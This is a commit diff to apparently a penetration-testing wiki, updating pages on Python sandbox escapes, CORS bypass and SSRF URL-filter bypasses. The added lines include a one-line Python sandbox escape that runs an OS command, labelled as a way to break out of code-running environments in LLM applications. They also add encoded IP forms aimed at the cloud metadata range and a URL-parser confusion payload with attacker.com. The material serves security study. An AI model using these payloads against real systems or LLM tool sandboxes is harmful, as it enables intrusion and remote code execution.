GITBOOK-4427: No subject

generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md

@@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/grte.png" alt="
 </details>
 {% endhint %}
 
-<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
 **Get a hacker's perspective on your web apps, network, and cloud**
 
@@ -23,8 +23,6 @@ Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/grte.png" alt="
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
-
-
 These are some tricks to bypass python sandbox protections and execute arbitrary commands.
 
 ## Command Execution Libraries
@@ -814,6 +812,10 @@ x = new_user.User(username='{i.find.__globals__[so].mapperlib.sys.modules[__main
 str(x) # Out: clueless
 ```
 
+### LLM Jails bypass
+
+From [here](https://www.cyberark.com/resources/threat-research-blog/anatomy-of-an-llm-rce): `().class.base.subclasses()[108].load_module('os').system('dir')`
+
 ### From format to RCE loading libraries
 
 According to the [**TypeMonkey chall from this writeup**](https://corgi.rip/posts/buckeye-writeups/) it's possible to load arbitrary libraries from disk abusing the format string vulnerability in python.
@@ -1171,7 +1173,7 @@ will be bypassed
 * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html)
 * [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)
 
-<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
 **Get a hacker's perspective on your web apps, network, and cloud**
 

pentesting-web/cors-bypass.md

@@ -271,6 +271,12 @@ Access-Control-Allow-Origin: https://target.application}.arbitrary.com
 Access-Control-Allow-Credentials: true
 ```
 
+### **Other funny URL tricks**
+
+{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
+[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
+{% endcontent-ref %}
+
 ### **Server-side cache poisoning**
 
 [**From this research**](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)

pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md

@@ -61,6 +61,10 @@ http://0xc0a80014/ = http://192.168.0.20
 0x7f.0x00.0x00.0x01
 0x0000007f.0x00000000.0x00000000.0x00000001
 
+# Mixed encodings bypass
+169.254.43518 -> Partial Decimal (Class B) format combines the third and fourth parts of the IP address into a decimal number
+0xA9.254.0251.0376 -> hexadecimal, decimal and octal
+
 # Add 0s bypass
 127.000000000000.1
 
@@ -174,7 +178,9 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) can generate vari
 
 ### Automatic Custom Wordlists
 
-Check out the [**URL validation bypass cheat sheet** webapp](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet) from portswigger were you can introduce the allowed host and the attacekrs one and it'll generate a list of URLs to try for you. It also considers if you can use the URL in a parameter, in a Host header or in a CORS header.
+Check out the [**URL validation bypass cheat sheet** webapp](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet) from portswigger were you can introduce the allowed host and the attackers one and it'll generate a list of URLs to try for you. It also considers if you can use the URL in a parameter, in a Host header or in a CORS header.
+
+{% embed url="https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet" %}
 
 ### Bypass via redirect
 
@@ -211,6 +217,10 @@ The _backslash-trick_ exploits a difference between the [WHATWG URL Standard](ht
 
 ![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)
 
+### Left square bracket
+
+The “left square bracket” character `[` in the userinfo segment can cause Spring’s UriComponentsBuilder to return a hostname value that differs from browsers: [https://example.com\[@attacker.com](https://portswigger.net/url-cheat-sheet#id=1da2f627d702248b9e61cc23912d2c729e52f878)
+
 ### Other Confusions
 
 ![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (600).png>)
@@ -221,6 +231,7 @@ image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-
 
 * [https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25](https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25)
 * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md)
+* [https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet](https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet)
 
 {% hint style="success" %}
 Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\